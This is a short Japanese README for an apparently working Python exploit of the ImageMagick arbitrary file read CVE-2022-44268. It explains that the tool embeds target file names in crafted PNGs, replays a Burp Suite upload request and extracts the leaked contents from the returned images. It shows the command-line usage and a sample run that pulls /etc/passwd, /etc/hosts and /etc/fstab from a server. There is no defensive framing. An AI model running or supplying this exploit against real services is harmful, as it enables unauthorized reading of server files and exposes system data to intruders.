
自動化されたPythonエクスプロイト for CVE-2022-44268(ImageMagickの任意ファイル読み取り)。細工されたPNGをアップロードし、返された画像からファイル内容を抽出し、結果をローカルに保存します。
cve-2022-44268 を使用して、入力ファイル内のプロファイル値に入力ファイルリストからのファイル名を追加し、Burpsuite(既に含まれている)からの入力 request.req ファイルを使用して画像ファイルアップロードを更新し、各変更された画像をアップロードし、返された URL から返された画像をダウンロードしてファイルコンテンツを抽出し、それを入力ディレクトリに配置する自動 Python スクリプト。
$ ./cve-2022-44268.py
usage: cve-2022-44268.py [-h] base_png filelist request_req output_dir image_output_dir
cve-2022-44268.py: error: the following arguments are required: base_png, filelist, request_req, output_dir, image_output_dir
$ ./cve-2022-44268.py image.png filelist.lst request.req output_dir image_output_dir
Exploiting for file: /etc/passwd
Saved shrunk image to: image_output_dir/etc_passwd_shrunk.png
Saved extracted content to: output_dir/etc_passwd
Exploiting for file: /etc/hosts
Saved shrunk image to: image_output_dir/etc_hosts_shrunk.png
Saved extracted content to: output_dir/etc_hosts
Exploiting for file: /etc/fstab
Saved shrunk image to: image_output_dir/etc_fstab_shrunk.png
Saved extracted content to: output_dir/etc_fstab